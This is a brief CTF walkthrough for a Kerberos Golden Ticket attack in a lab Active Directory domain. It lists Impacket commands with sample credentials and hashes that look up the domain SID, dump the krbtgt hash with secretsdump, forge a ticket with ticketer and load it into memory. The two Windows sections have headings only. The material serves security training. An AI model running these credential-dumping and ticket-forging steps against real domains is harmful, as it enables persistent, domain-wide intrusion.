CTF: Golden Ticket Walkthrough

Attack Scenario

Assume that you have two domains - one parent domain and subordinate domain(s). When you compromise the subordinate domain, you want to access to the parent or/and other domain(s). In this scenario, use a Golden ticket to get an enterprise admin access to the entire domain.

With Kali

# Get Domain SID
python lookupsid.py ignite/Administrator:Ignite@987@192.168.1.105

# Get Krbtgt hash & domain name
python secretsdump.py administrator:Ignite@987@192.168.1.105 -outputfile krb -user-status

# Create a Golden Ticket
python ticketer.py -nthash f3bc61e97fb14d18c42bcbf6c3a9055f -domain-sid S-1-5-21-3523557010-2506964455-2614950430 -domain ignite.local raj # random user

# Import it into memory 
export KRB5CCNAME=/root/Tools/impacket/examples/raj.ccache

Windows: Access with Golden Ticket now

Windows: Access with Golden Ticket later

Last updated